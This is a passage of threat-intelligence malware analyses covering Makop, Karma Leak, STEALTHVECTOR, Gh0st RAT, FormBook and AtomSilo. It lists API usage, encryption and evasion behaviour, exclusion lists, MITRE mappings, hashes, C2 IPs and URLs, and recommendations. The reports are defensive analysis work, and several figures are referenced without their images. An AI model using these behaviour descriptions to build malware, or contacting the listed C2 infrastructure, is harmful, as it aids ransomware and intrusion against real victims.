The API GETLogicalDrives is used to find information about logical drives in the system and GetVolumeInformationW retrieves information about the file system and associated volumes while the GetDriveTypeW API checks if a disk drive is a network, RAM, CD-ROM, removable or fixed drive. “Makop Ransomware does not target RAM and CD-ROM Drives.

 

Figure12

The CryptAcquireContextW API here is used to acquire a handle to a key container within a cryptographic service provider and CryptGenRandom API is used to generate random bytes.

Figure13

 

In Figure14 below, the malware is creating a thread and implementing mutex and waiting for a single object to access at a particular time.

Figure14

In Figure15 below, the API GetFileAttributeW is used to access file system attributes corresponding to a specified file or directory. Further dynamic memory allocation is implemented using GetProcessHeap to retrieve the handle to the default heap of the calling process.

Figure15

The files are enumerated using the FindFirstFileW and FindNextFileW APIs as shown in Figure16 given below.

Figure16

 

The cryptographic key is imported by calling the CryptImportKey, as shown in Figure17 below. Using the key, the malware encrypts data by calling the CryptEecrypt function and destroys the cryptographic keys afterward.

Figure17

Figure18 shows the malware is initializing the critical section and implementing synchronization/semaphore for the shared resource access.

Figure18

As shown in Figure19 below, the malicious binary accessing and writing into a file.

Figure19

Figure20

 

The ransomware uses the GetVersion function to get information about the major and minor version numbers of the OS along with other information The GetTokenInformation API is used to determine the elevation level of the token and the malware opens the access token associated with the current process.

Figure 21

The APIs mentioned in Figure22 given below that is WNetOpenEnumW and WNetEnumResourceW are used to enumerate the network resources.

Figure22

Figure23

The ransomware retrieves the command-line string/arguments of the current process as shown in Figure24 given below.

Figure24

 

Figure25

GetSystemWindowsDirectoryW function retrieves shared windows directory on a multiuser system and the SHGetSpecialFolderPathW retrieves the path of folder identified by its CSIDL as shown in Figure25 above. The malware accesses the serial number of the drive by using GetVolumeInformation and also the value of the “SystemDrive” environment variable is retrieved using the GetEnvironmentVariableW API as shown in Figure26 given below.

Figure26

In Figure27, the malware is taking snapshots of the process which includes heap, modules, and thread information. The processes are enumerated using the Process32FirstW and Process32NextW APIs.

Figure27

Figure28

In Figure28 above, the malware is accessing and querying registry entries.

 

List of IOCs

Mitre Attack Tactics and Techniques 

Sr No. Tactic Technique
1 Initial Access (TA0001) T1566 Phishing
2 Execution (TA0002) T1204.002 Malicious File
3 Persistence (TA0003) T1547.001 Registry Keys
4 Defense Evasion (TA0005) T1112 Modify Registry
5 Discovery (TA0007) T1082 System Information Discovery
6 Impact (TA0040) T1486 Data Encrypted

 

 

KARMA Leak Ransomware Technical Analysis

KARMA Leak Ransomware Technical Analysis

 

Risk Score: 8

Confidence Level: High

Suspected Malware: Karma Leak Malware.

Function: Ransomware.

Tactic Used: Data Encryption.

Other Malwares related to Karma: GangBang, Milihpen, JSWorm

First Seen: June 2021

Target Industry: Multiple

 

Brief Introduction:

“Karma Leak” was first been detected in June 2021 and is a new ransomware. Another group with same name in 2016 has not any link to the current working threat group “Karma Leaks”. It has been observed that the Karma has somewhat linkage to Milihpen and Gangbang in accordance with similarity in coding part.

Karma Ransomware is constantly evolving, upgrading and improvement is a regular process. It encrypts all files except some extensions on the compromised system and appends the encrypted files with extension .KARMA_V2. Earlier it used the extension .KARMA. Karma ransomware also drops the ransomware note into each folder with name KARMA_V2-ENCRYPTED.txt.

Detailed “Karma Leaks” Ransomware Analysis:

File Details: As shown in Figure1, following are the details related to the malware “Karma Leaks”.

File Type: Windows PE-32 Executable

MD5: 21e7fb1c4d27ebdfc0d081e59cbeca8f

SHA256: 84d24a16949b5a89162411ab98ab2230128d8f01a3d3695874394733ac2a1dbd

Subsystem: GUI

Compilation Time: Sept 2021

 

Figure1

 

 

Figure2

 

As shown in Figure1 and Figure2 above, the file corresponding to ransomware “Karma Leaks” is Windows-PE 32 bit executable. It has GUI subsystem and compilation time is Sept 2021 which is quite recent.

 

The Figure3 below tells us that the file is not packed and Figure4 shows different hashes corresponding to the malware.

 

Figure3

 

Figure4

 

Figure5 shown below provides us information that the malware implemented Data Execution Prevention.

 

Figure6

 

We have checked the dark web for Karma Leaks onion website through TOR and it is currently unavailable as shown above in Figure6.

 

Figure7

 

Figure7 above mentioned only three sections are part of the malware and look quite normal except the .data section which is a virtualized section only because it takes up no space on disk and only will be used during execution. Further, as we mentioned earlier, the malicious file subsystem is GUI, but it does not have any resource section which generally contains menus, icons corresponding to any GUI application.

 

Figure8

The malicious file imports libraries Kernel32.dll, user32.dll and gdi32.dll as mentioned above in Figure8. The kernel32.dll used for memory, hardware or low-level access and manipulation. The gdi32.dll is used for graphics handling and manipulation while user32.dll is used to handle user-interface components. The APIs/functions corresponding to these above-mentioned DLLs imported by the malware are shown below in Figure9.

 

Figure9

 

Above mentioned functions give us an indication that the “Karma Leaks” have the following capabilities or functionality:

  1. Capability to collect system information.
  2. Capability to create mutex, so that only one instance of the malware can run at a particular time.
  3. Dynamic memory allocation and manipulation capability.
  4. Capability to synchronize between various threads, processes and while accessing shared resources.
  5. Have the capability to access native APIs to perform low-level functions like handling/manipulation of hardware, memory, and processes directly.
  6. Capability to create new threads and processes.
  7. Capability to access registry entries and manipulate them.
  8. Capability to load other DLLs, libraries, and processes in memory.
  9. Capability to sleep or deactivate when want to hide itself.
  10. Ability to handle, search, open, close, write, access and manipulate files.
  11. Capability to search Drives, Folders and exclude some specific files/folders from encrypting.
  12. Capability to handle command-line arguments.
  13. Ability to encrypt files.
  14. Ability to check the status of last command execution or error status and execute the code accordingly.
  15. Malware used API CreateIOCompletionPort which indicates the capability of malware to maintain communication between the main thread and its sub-threads and is most probably used to handle encryption process with efficiency.

Figure10

Figure10 above shows the extensions .exe, ini, .url, Ink which are not supposed to be encrypted by the ransomware. The file types mentioned in Figure11 given below are the files which are accessed and encrypted by the ransomware when we executed it over our analysis machine.

Figure11

 

Figure12

In addition to some specific files extensions, the KARMA ransomware also excludes some of the folders from the process of encryption. As shown in Figure12, it does not encrypt $RecycleBin, Windows, Users, Program Data, Program Files, Program Files (x86) folders.

 

Figure13

Figure13 above displays signs of cryptographic functions like CryptStringTOBinary and dlls like crypt32.dll used by the malware to encrypt the files present in the system. The KARMA and KARMA_V2 confirm the malware is KARMA Leaks ransomware. Figure14 given below also shows that the ransomware code is loading the library “crypt32.dll” by using LoadLibraryA API.

 

Figure14

Figure15 below shows that when the malware executes, it searches each drive and folder and drops a ransom note “KARMA_V2-ENCRYPTED.txt” which contains the contents mentioned in Figure16. The contents mentioned that the system is breached, and files are encrypted. In order to get the data back, the victim has to pay the ransom amount.

 

Figure15

 

Figure16

Figure16 above also mentioned the tor link where the data will be leaked if the victim is not able to pay the ransom. In addition to that three email-ids of onionmail, tutanota and protonmail are given in case the victim wants to contact the malware authors.

Figure17 shows all files in a folder get encrypted and the extension .KARMA_V2 is appended to them. The ransomware note KARMA_V2-ENCRYPTED.txt is also dropped in the folder. Further, the file with extension .exe is not encrypted as we mentioned earlier that the ransomware excludes some of the files having some specific extension like .exe. Figure16 shows the encrypted contents of a file.

 

Figure17

 

Figure18

 

Figure19

 

Figure18 shows the multiple threads running corresponding to the malware KARMA.

 

Figure 19 provides us with information about how the malware gets started. First, the thread is created and the .exe image of the malware is loaded into memory and after that, it loads the native API ntdll.dll. Further, it accesses the different registry entries and their values for managing sessions or getting information about the commands to be executed before loading any service.

 

Figure20 also shows us the number of 32-bit DLLs loaded by the malware like user32.dll, gdi32.dll, advapi32.dll. Advapi32.dll and sechost.dll are specifically important as they are used to access and manipulate registries and processes by the malware.

 

Figure20

Figure21

 

Figure21 shown above also indicates towards loading and usage of crypt32.dll by the malware for encryption purposes as mentioned earlier and also dropping ransom note KARMA_V2-ENCRYPTED.txt into different folders.

Figure22 below shows the list of all registries accessed or manipulated by the malware.

 

Figure22

Figure23

 

Figure23 above shows how the mutex is created by the malware as it is necessary that only one instance is running of the malware at a particular time.

 

List of IOCs:

 

Sr No. Indicator Type Remarks
1 21e7fb1c4d27ebdfc0d081e59cbeca8f File Hash MD5
2 84d24a16949b5a89162411ab98ab2230128d8f01a3d3695874394733ac2a1dbd File Hash SHA256
3 [email protected] emailid Malware author emailid
4 [email protected] emailid Malware author emailid
5 [email protected] emailid Malware author emailid

 

 

Mitre Attack Tactics and Techniques:

Sr No. Tactic Technique
1 Initial Access (TA0001) Phishing
Exploit Public-Facing Application
2 Execution (TA0002) Malicious File
3 Persistence (TA0003) Registry Keys
4 Defense Evasion (TA0005) Registry Modification
Disable or modify tools
5 Discovery (TA0007) File and Directory Discovery
6 Impact (TA0040) Data Encrypted for Impact

 

 

Recommendations:

  1. Must implement regular back-ups policy. Have more than one back-up and kept one of them on a separated network and other offline.
  2. Implement complex password policy and multi-factor authentication for user as well as for email accounts.
  3. Implement renewal of passwords on regular intervals.
  4. Use best anti-virus/anti-malware/anti-spam/anti-ransomware, IDS/IPS, and firewall solutions.
  5. Regular third-party audits.
  6. Implement vulnerability assessment of organizational resources specifically facing internet and regular updation/patching policy.
  7. Regularly update all software on all systems and network and other devices.
  8. Implement segmentation of network and user resources.
  9. Implement Internal threat management policy which includes, train and educate employees about latest threats and ransomware attacks and how to behave in such scenarios.
  10. Implement Role Based access policy and restrict it to minimal as per the requirement.
  11. Refrain from clicking or opening suspicious/unauthorized links and files, specifically on organization devices.

 

 

Malware Analysis related to APT41 – STEALTHVECTOR

Malware Analysis related to APT41 – STEALTHVECTOR

Risk Score: 8.

Confidence Level: High.

Suspected Malware: Trojan.Win64.STEALTHVECTOR.SMZTID-B

 

Malicious Loader Sample Analysis:

MD5: b3f3de10b3c1c15491c53223f1b5979f

SHA256: 91aa05e3666c7e2443fc1f0f0142f1829f5ec51e289c95b10811531da50eb2b3

File Details: As shown in Figure1, following are the details related to the malware.

File Type: Windows PE-64 Executable

Subsystem: GUI

Compilation Time: Oct 2020.

Figure 1

Figure 2

 

As shown in Figure1 and Figure2, the malicious sample is Visual C/C++ based. It is 64-bit Windows PE executable having GUI subsystem and compile stamp of Oct 2020. The corresponding hashes are also mentioned in Figure1 which may act as IOCs for the malware. Further high entropy indicates that malware may be packed.

Figure 3

 

When we analyzed the file through different anti-virus engines, they detected the file as malicious and generally suggest that it has trojan capability. Some anti-viruses specifically categorized it related to STEALTHVECTOR.SMZTIB, CobaltStrike, Emotet indicates that this malicious file may be used by these malware campaigns also.

Figure4

Figure 5

Figure4 above shows different sections present in the malware and looking quite normal and Figure5 shows the libraries imported by the malware. All are important and indicate the functionality possessed by the malware. kernel32.dll is a common library and its presence points towards the fact that the malware may access and manipulate memory, files, or hardware. advapi32.dll is used to access and manipulate registry entries, shell32.dll is used to open webpages, shlwapi.dll is also important and used to handle URLs. Furtherimagehlp.dll is also significant as it can be used by malware to access data contained in any PE file.

 Figure6

Figure7

Figure6 shows the various APIs used by the malware and Figure7 shows the strings extracted from the malware. The APIs and strings mentioned in Figure6 and Figure7 indicate the following capabilities possessed by the malware.

  1. Anti-Debugging Capability.
  2. Capability to create mutex so that only one instance of the malware can run at a particular time.
  3. Ability to gather user and system information.
  4. Dynamic memory allocation, handling, and manipulation capability.
  5. Ability to create new threads, processes, and their manipulation.
  6. Ability to retrieve the path of system directory and access DLLs present there.
  7. Synchronization capability to handle multiple processes and threads and to access shared resources.
  8. File handling and manipulation capability includes search, open, close, write, access, and can perform operations on files.
  9. Capability to handle command-line strings.
  10. Capability to handle Thread Local Storage used to hide code by malware.
  11. Have the capability to access native APIs to perform low-level functions like handling/manipulation of hardware, memory, and processes directly.
  12. Ability to access and manipulate registry entries for persistence and other purposes.
  13. Capability to load other DLLs, libraries, and processes in memory.

Figure8 

Figure9

Figure8 above shows the original name of the malware that is “sysinfotool” and related to Microsoft. Further, when we executed it, the highlighted part in Figure9 mentioned that the malware/application is of Microsoft which indicates that the malware disguised as a legitimate application to hide its presence and thwart detection from anti-malware solutions.

 Figure10

When we execute the malicious sample which has the name “ChaChaLoader.exe” as shown in Figure10. It drops the DLL AdmTmpl.dll in the same folder and we analyzed and explore it, it was found to be a valid system file and generally used to create new records/entries in the registry. So, the purpose here is either to hook this valid legitimate file by process injection or hollowing or simply used its functionality to create new records in the registry for malicious and persistence objectives.

Figure11

Figure12

Figure11 and Figure12 show details about the suspicious “AdmTmpl.dll” file, It is a 64-bit DLL having compile time of Nov 2010 which matches with other valid system files on the system and is related to Microsoft.

Figure13

Figure13 above shows some of the registry entries the malware is accessing. Further Figure14 and Figure 15 shows all the different system, browser and other files accessed by the malware during execution.

Figure14

Figure15

 

As shown in Figure14, the malware accesses many system DLLs from the folder where it resides but in actual those files are not there, so it indicates that the malware accessing the system32 folder where these files reside, copies them in hidden mode in the folder where it resides, use them or hook them for its own purpose and later on delete them. Figure14 also shows that how the malware accesses many files under the System32 folder. Further, see the highlighted part in Figure15 where it is accessing powershell.exe and could be used it to run any Powershell script. Figure16 shown below mentioned one IP and one Url accessed used by the malware. When we check online they appear to be clean, only one vendor signifies the IP to be linked to a malicious file. Figure17 below shows how the malware starts the process and creates a new thread of execution and accessing various registries, files and folders during execution and also Loading many system DLLs into memory.

Figure16

Figure17

List of IOCs

 

Blacklisted IP (Gh0st RAT) Analysis

Ongoing analysis of Gh0st RAT

Blacklisted IP: 23[.]225.73.110

Risk Score: 10

Confidence Level: High

Associated Malware: Gh0st RAT

Function: Gh0st RAT C&C

ITW Associations: EMISSARY PANDA, Hurricane Panda, Lazarus Group, Leviathan, Stone Panda

Associated Hash (MD5): c61470df88115bd1c14540652f48ef49

File Name: svchsot.exe

DeCyfir presence: Yes

About Gh0st RAT: Gh0st RAT is a unique example of a RAT (Remote Access Trojan) which is mostly used by Chinese Threat Actor groups.  The RAT has multiple capabilities including:

  • Control of the remote screen on the infected bot.
  • Real time as well as offline keylogging.
  • Provides live feed of webcam and microphone of infected host.
  • Download remote binaries on the infected remote host.
  • Control of remote shutdown and reboot of host.
  • Disable infected computer remote pointer and keyboard input.
  • Enter the shell of remote infected host with full control.
  • Provide a list of all the active processes.
  • Clear all existing SSDT (System Service Dispatch Table) of all existing hooks.

Gh0st RAT is also known to be used to install a cryptocurrency miner on the victim machines.

Target Industries: Government Agencies, Embassies, Foreign Ministries, Military Offices

Target Region: Southern and South-East Asian Countries

Distribution: Spear-Phishing, EternalBlue SMB Exploit, Via Daserf Malware

 

Associated Hash Analysis:

File name: svchsot.exe

MD5: c61470df88115bd1c14540652f48ef49

SHA1: d3d39e2ff6b8f9d8d04d72385b48fc1cc3429407

SHA256: 2d29648e8ef3eb8e7dcb9632359d315ecabee7c32a0c3f3f622b124fd7c07da1

 

The Gh0st RAT dropper arrives on a victim machine primarily via and EternalBlue/DoublePulsar Exploit. The dropper executable is then launched and it decrypts and loads the Gh0stRAT DLL into memory.

 

Static Analysis Information:

    • EXE:
    • MachineType:   Intel 80386, for MS Windows
    • PEType:              PE32
    • EntryPoint:        0x4290
    • Subsystem:        Windows GUI

 

    • TRiD:
    • .exe |   Win32 Executable MS Visual C++
    •  .exe |   Win64 Executable
    • .scr |   Windows screen saver
    • .dll |   Win32 Dynamic Link Library
    • .exe |   Win32 Executable
    • Imports:
    • Kernel32.dll

Behaviour Analysis Information:

Process Flow:

svchsot.exe

– Changes the autorun value in the registry (Malicious)

– Connects to CnC server (Malicious)

– Gh0st was detected (Malicious)

Reads the computer name (Suspicious)

Checks supported languages (Suspicious)

– Reads CPU Info (Suspicious)

 

Network Analysis Information: 

Function Protocol Process Name IP Port Domain/URL
C&C HTTP svchsot.exe 23.225.73.110 8000 www.wk1888.com

 

MITRE ATT&CK Techniques: 

Execution Discovery
T1129 – Shared Modules

Signature – dropper

 

 

T1057 – Process Discovery

Signature -process_interest

 

 

Check back this page for further analysis.

FormBook Malware Technical Analysis

Overview

Risk Score: 8

Confidence Level: High

Suspected Malware: FormBook Malware/Trojan

Function: Information Stealing, Credential Harvesting and download/drops stealthier malware

Tactic Used: Process Injection/Process Hollowing

Threat actor Associations: ng-Code

Other Malware related to FormBook: XLoader

First Seen: July 2016

Latest Seen: Nov 2021

Target Industry: Multiple

Target Countries: Multiple/Global Effect but predominately the US

Relevancy: Global Effect and used the latest zero-day vulnerability of Office-365 in 2021.

Brief Introduction: FormBook Malware is quite popular among attackers. It is basically an information stealer/trojan and is available in darkweb market as a Malware-as-Service. It is first seen in July 2016 and has been quite active since then. In 2020 it affected 4% of organizations worldwide and was among the top 3 list of trending malware. It logs and monitors keystrokes, searches and accesses files, takes screenshots, harvests credentials from different browsers, drops files, downloads, and executed stealthier malware as per commands received from Command-and-Control-Server (C2).

XLoader appears in 2020, consider as the successor of FormBook having similarities on the base of code and also advertise for sale in the same dark-web forums where FormBook was earlier sold. XLoader also has the capability to compromise macOS.

FormBook is mainly distributed using email campaigns, various infecting mechanisms and different types of file attachments including pdfs, doc, RTF document, exe, zip, rar etc. It takes advantage of various vulnerabilities like CVE-2012-0158 (Microsoft Windows Common Controls ActiveX Control Arbitrary Code Execution Vulnerability), CVE-2017-01182 (Microsoft Office Memory Corruption Vulnerability), CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execution Vulnerability), and recently used an Office-365 zero-day vulnerability CVE-2021-40444 (Microsoft MSHTML Remote Code Execution Vulnerability).

FormBook Analysis:

File Details: As shown in Figure1, the following are the details related to the malware “FormBook”

File Type: Windows PE-32 Executable

MD5: c504f8e950801fd90e45b01023c29702

SHA256: be24cc41a8c8b2c292743055cccd8a9ca25eddcaa26aa984a63a6dff70ddae55

Subsystem: GUI

Compilation Time: April 2016

Figure 1

Figure1 above shows that FormBook Malware is a Windows PE-32 Executable and has the signature of Nullsoft Installer. The file has different parts, one PE executable along with an embedded XML document and two lzma compressed files.

Figure2 and Figure 3 show the different hash values corresponding to our malware file. Figure 2 also other basic information like it has GUI subsystem and compilation time of April 2016.

Figure2

Figure3

Figure4

Figure5

Figure4 above shows that the malware has an NSIS installer, and it is present in the overlay part. We further examine and extract it. Figure5 shows the entropy curve corresponding to the malware. It mentioned it as not packed but the curve at the end is somewhat flat with high entropy provides us an indication of the presence of some packed code inside the executable file.

Figure6

When we check, the malicious file in different anti-virus engines then it is detected as primarily a trojan/spyware/information stealer which is the main function of the FormBook malware.

Figure7

Figure7 above shows us different sections present in the FormBook. All are quite normal except .ndata which is totally a virtualized section means only available in memory.

Figure8

Figure8 above shows different libraries imported by the FormBook. All are important and provide us an indication of the functionality the malware incorporates. It includes memory, low-level functioning, user interface, graphical manipulation, registry access and manipulation capabilities. Shell32.dll and Ole32.dll are quite important here as ole32.dll is used for handling ole objects and is required for embedding ole objects of different applications to another application like excel-sheet embedded into a word document whereas shell32.dll is used to open webpages and files. 

Figure9

Figure9 above shows the various APIs/Functions corresponding to the above-mentioned libraries in Figure8 and provides us important information that the FormBook malware has the following capabilities:

  1. Anti-Debugging Capability.
  2. Capability to collect system information.
  3. Capability to handle windows/GUI functions.
  4. Ability to create new threads, processes, and their manipulation.
  5. Synchronization capability to handle multiple processes and threads and to access shared resources.
  6. Have the capability to access native APIs to perform low-level functions like handling/manipulation of hardware, memory, and processes directly.
  7. Ability to access and manipulate registry entries.
  8. Capability to load other DLLs, libraries, and processes in memory.
  9. Ability to handle, search, open, close, write, access and manipulating files.
  10. Capability to search Drives, Folders.

Figure10

Figure10 above shows the XML code present as manifest in the file. It contains meta-data corresponding to different files that are part of the same group or package. The privileges are used as “asInvoker” which means adopting any privilege assigned to the user. This further demonstrates the dependency on NullSoft NSIS and its version number. NSIS is a free framework used to bundle many elements of an application together including DLL or executable, and an NSIS script is also bundled along with the application/file/malware to control how all can be extracted and executed.

 

Figure 11 below also shows the overlay part present in the file. It also has the Nullsoft signature. FormBook most likely used it to bypass anti-viruses and load or extract the code/files present in the overlay section which are packed by using Nullsoft installer.

Figure11

We further extracted the hidden files present in our malicious executable as shown in Figure12 which are dropped by the file when it gets executed and used accordingly. There are three more files present in our malicious executable, one is the DLL “jnjvrzet.dll” which is present in the folder named $PLUGINSDIR and the second is the .nsi file which is the NSIS script to control that how to extract and use these files as mentioned above. The third file is “6ce1nlzjaolgh5df” which is in lzma compressed and encrypted also and most probably is an executable or DLL and the main payload.

Figure12

Figure13 and Figure14 show hexdump corresponding to the file DLL “jnjvrzet.dll” and “6ce1nlzjaolgh5df”.

Figure13

Figure14

Figure15

Figure16

Figure15 and Figure16 show the snippets of .nsi script corresponding to Nullsoft Installer to control the process of extracting these embedded files and how to use them for further exploitation. It accesses various folders, creating files, copying, and doing initialization, etc.

 

We further checked the extracted .DLL file “jnjvrzet.dll” as shown below in Figure17. It is Windows 32-bit DLL. We checked it through different anti-virus engines and found it to be malicious and they categorized it as mainly trojan as shown in Figure 18.

Figure17

Figure18

Figure19

The imported libraries corresponding to the extracted DLL are shown in Figure19 above. The presence of ws2_32.dll and wsnmp32.dll indicates that our extracted DLL is responsible for handling and managing network connections. Setupapi.dll is also quite important as it is used for setting up and installing the applications means the extracted DLL also helps in installing or setting up other malicious files for execution and most probably the main payload.

Figure20

Figure20 above shows the imported APIs/Functions by our extracted DLL. The DLL also has the following capabilities in-addition to the capabilities we mention for our malicious executable:

  1. Capability to deactivate/sleep to hide its functionality or capability to wait for any trigger to continue
  2. Capability to manage network connections
  3. File handling, searching and manipulation capability
  4. Capability to handle Critical Sections/locks to handle shared resources
  5. Capability to access Thread local storage area and handling of multiple threads
  6. Several anonymous functions and their validity or usage are not yet confirmed
  7. Ant-debugging capability

Figure21

Figure21 mentioned above shows the processes spawned by the malicious executable when it runs. It starts and creates various processes and threads, loads various system libraries, and accesses many registry entries.

List of IOCs

Mitre Attack Tactics and Techniques

 

Malware Research on AtomSilo Ransomware

Malware Research on AtomSilo Ransomware

AtomSilo is a new Ransomware recently seen in September 2021 during one of their attacks by exploiting a recently revealed vulnerability (CVE-2021-26084) in Atlassian’s Confluence Collaboration Software for initial access. The Ransomware used the double extortion method which is gaining popularity among ransomware threat actors where they first, exfiltrate the confidential information and as a second step encrypt the system files.

The attackers after gaining initial access to the above-specified software group server were installed a stealthier backdoor by using DLL side loading technique on legitimate third-party software. This backdoor can connect to its command-and-control server and is able to execute Windows shell commands through the Windows Management Interface (WMI). During lateral movement, the attackers trying to exploit more servers and install additional backdoors by compromising administrative accounts and at last drop AtomSilo Ransomware to the compromised server.

Risk Score: 8

Confidence Level: High

Suspected Malware: AtomSilo Malware.

Function: Ransomware.

Tactic Used: Double Extortion includes Data Exfiltration and Data Encryption.

Threat actor Associations: Unknown

Other Malware related to AtomSilo: Similarities in code with LockFile.

First Seen: September 2021

Target Industry: Multiple.

Target Countries: Multiple

In the initial analysis, it is a little bit difficult to understand the AtomSilo in terms of its relation to a particular ransomware or threat group as it copied different parts from different ransomware or threat groups as specified below and in Fig 1:

Atomsilo has similarities with the code of Lockfile which in-turn copied the ransom note page of Lockbit.

Fig 1:

AtomSilo used the ransom notepage of Cerber version6. (Figure2)

 

AtomSilo copied the BlackMatter’s site contents. (Fig 3)

As per the information provided on their dark website, AtomSilo group followed the same policy of BlackMatter ransomware group to not attack the following industries/organizations:

  1. Medical Facilities like hospitals
  2. Oil Refineries and Gas pipelines
  3. Important infrastructure facilities like Nuclear Power plants and Water plants
  4. NGOs and Educational Institutes/Universities

Broadly we can say that the AtomSilo is up to some extent identical to LockFile specifically in terms of functionality as both have similarities in coding part but the AtomSilo has its own novel tactics and techniques like DLL side-loading technique.

 

Tactics, Techniques and Procedures (TTPs)

Initial Access: The initial point of compromise in this attack was a vulnerability that was only public for about three weeks at the time. In particular, the ransomware operators were observed targeting a recently patched and actively exploited Confluence Server and Data Centre vulnerability to deploy their ransomware payloads.

Compromise and lateral movement: After gaining initial access through a Confluence server via an Object-Graph Navigation Language (OGNL) injection attack, this code injection on the Confluence server provided a backdoor, via which the attacker was able to drop and execute files for another, stealthy backdoor. The payload dropped for the second backdoor consisted of three files. One of them was a legitimate, signed executable from a third-party software provider that is vulnerable to an unsigned DLL sideload attack.

Defense Evasion: Atom Silo made significant efforts to evade detection before launching the ransomware, which included well-worn techniques used in new ways. Other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware.

Impact (Data Encryption, Exfiltration): The ransomware actors begin their own discovery and exfiltration efforts, checking the local volumes attached to an important server and then checking its history of Remote Desktop sessions. Using RDP, the ransomware gang then went hands-on-keyboard, dropping and executing the RClone utility to copy data off the server to a Dropbox account from several directories. The process was repeated on another server. Soon after the exfiltration was complete, the intruders connected to the domain controller and dropped their all-in-one attack executable.

The ransomware starts encrypting files in a similar fashion to LockFile, adding a .ATOMSILO extension to encrypted files. The ransomware dropped a ransom note formatted in HTML, with instructions on how to contact Atom Silo’s operators.

Detailed AtomSilo Ransomware Analysis:

The AtomSilo malicious file is Windows-PE 64-bit executable as shown in Fig 4 and in Fig 5 we have mentioned different hash values for the malware and these values could also act as IOCs.

Fig. 4

Fig. 5

Fig 6

Fig 7

Fig 6 brief us that the compiler and linker for the malware sample are Microsoft Visual Studio with their version and Fig 8 shows the entropy of the malware and tells us that the malware is not packed.

Fig 8

As shown in Fig 8 above, we have checked our sample file through various Anti-viruses Engines and what we observe has strengthened our initial analysis that most antivirus detects it as malicious in nature and ransomware. Further many anti-viruses also detect it as a variant of LockFile ransomware (boxed out in Fig 8) as we have mentioned in the beginning also that there are code similarities between AtomSilo and LockFile ransomware.

Fig 9 below confirms that our sample is PE-64bit executable having compile time of 24-Sep 2021 which is quite recent.

Fig 10

Fig 10 shown above indicates that the malware has a subsystem console i.e., it does not have any GUI. Further, it implements techniques like ASLR and DEP which help in preventing any other security program to predict its addresses and execute code in certain areas. It also makes it difficult for a malware researcher to analyze it. Such techniques are not added specifically but now are part of the compiler and other low-level programs like OS while we code and compile any program but definitely makes sense while we analyze or revere-engineer any executable whether it is a malicious program or a legitimate one.

Fig 11

Fig 12

Fig 11 and Fig 12 above give us information about different sections present and the libraries imported by the malware. Both pieces of information are very important from point of view of analysis.  .text section contains mainly the executable code of the malware. The imported libraries/DLLs are also important like Kernel32.dll used for low level or kernel level functioning while advapi32.dll presence indicates that the malware in some way must be accessing system and registry information or may try to manipulate it. Wininet.dll is also important as it is used to interact with FTP and HTTP protocols or broadly for internet/network connections which signify that malware may try to make outside connection. Wtsapi32.dll is important for making remote connections. Similarly, userenv.dll could be used to manipulate user profiles.

Fig 13.1

The figures above show various API functions part of different libraries. With analysis of all the above functions, we may say that the AtomSilo Ransomware must have the following capabilities:

  1. AtomSilo has multiple Anti-debugging capabilities to detect the debugger which create problem in analyzing it.
  2. Collecting System, System Time/date/Time-Zone and Environment Information.
  3. Virtualization and Sandbox Evasion capability.
  4. Deactivate/sleep itself for some time to hide its presence.
  5. Have the capability to access native APIs to perform low-level functions like handling/manipulation of hardware, memory, and processes directly.
  6. Capability to access and modify registry entries for persistence.
  7. Capability to load other libraries, processes, and DLLs in memory.
  8. Capability to create mutex so that only a single instance will run at a particular time.
  9. Ability to create critical sections and semaphores for resource sharing and multiple threaded process synchronization.
  10. Ability to create, close, open new threads and processes.
  11. Capability to make network/internet connections and also be able to handle HTTPS protocol requests. Has the ability to communicate with C2 server.
  12. Privilege escalation capability by accessing and manipulating tokens.
  13. Capability for handling, searching, writing, accessing files information and manipulating files which includes file creation, closing, loading files into memory, read and modifying them.
  14. Some above APIs indicate that the AtomSilo ransomware is also able to access Thread Local Storage Area which is generally used to execute some code before the main entry point and also used to access values related to threads.

Fig 14

Fig 14 above shows the start of the execution of AtomSilo ransomware, creating threads, Loading images of various DLLs, and accessing many registry entries.

 

Fig 15 given below shows multiple threads running of AtomSilo.exe and native API usage.

Fig 16

Fig 16 above and Fig 17 given below also give us sign about the cryptography/encryption algos used for encryption. AtomSilo use XOR and AES Encryption algorithms for encryption and it generates AES keys by using “aeskeygenassist” function as shown above in Figure 16.

Here in Fig 17 below, we have compared two files. The file on the right-hand side is the normal text file having some contents while on the left side is the hexdump of the same file after encrypted by the AtomSilo Ransomware. The main thing we observe here is that the ransomware can’t encrypt the whole contents of the file but encrypt some parts as highlighted in yellow rectangles in Figure17 and the other remaining part is a normal text readable as before. It is like it encrypts the first 16 bytes, then no change in the next 32 bits, and again encrypts the next 16 bits, and so on. At the end of the file (highlighted in green rectangle), is other data or encryption keys encrypted and append at the end of the file.

Fig 17

Fig 18

Fig 18 above provides us with two main IOCs for the AtomSilo ransomware that is a url: http://139.180.184.147:45532/fake.php and IP address: 139.180.184.147. Further, AtomSilo tries to access each file on the system and encrypt all files and folders except following:

autorun.inf, index.html, boot.ini, bootfont.bin, bootsect.bak, desktop.ini, ntuser.dat, ntuser.dat.log, ntuser.ini as highlighted in Figure18.

Fig 18 also highlighted following file types: .hta, .exe, .cpl, .ini, .cab, .cur, .cpl, .cur, .drv, .hlp, .ico, .sys, .spl, .ocx, the AtomSilo ransomware does not encrypt the files having these extensions.

Fig 19, Fig 20 below show the AtomSilo ransomware when it executes, enumerates each drive and folder, encrypts the files, and drops a ransom note as shown above in Figure2 in each folder with extension .hta. The format of the ransom note .hta file is README-FILE-{Name of the Computer}-{Random Number}.hta.

Fig 19

Fig 20

Further, each encrypted file ends with the extension .ATOMSILO as shown in Fig 20 above and Fig 21 below.

Fig 21

List of IOCs

# Indicator Type Remarks
1 17b447b971a4977b2bfb2c28659aa1dd File Hash MD5
2 5fa490668a9963e97d956f9a3b0c746b1d16eee9a73dfba875c9a3dc0e2c0d1b File Hash SHA256
3 a92fdc07cbf295bbf90174820a1a24b7909bd55845acd6f01ca36a2540aed822f6a9fca8d5d78052917b55355c65ad

2a80cde03f285493277162691f51c39949

File Hash SHA512
4 http://139.180.184.147:45532/fake.php URL
5 139.180.184.147 IP Address

Mitre Attack Tactics and Techniques

# Tactic Technique
1 Initial Access (TA0001) Phishing
2 Execution (TA0002) Malicious File
3 Persistence (TA0003) Registry Keys
4 Defense Evasion (TA0005) DLL Side Loading Technique
5 Discovery (TA0007) Process Discovery
System Information Discovery
6 Lateral Movement (T1210) Exploitation of Remote Services
7 Command and Control (TA0011) Execute Windows Shell Commands
8 Impact (TA0040) Data Encrypted

 

Recommendations

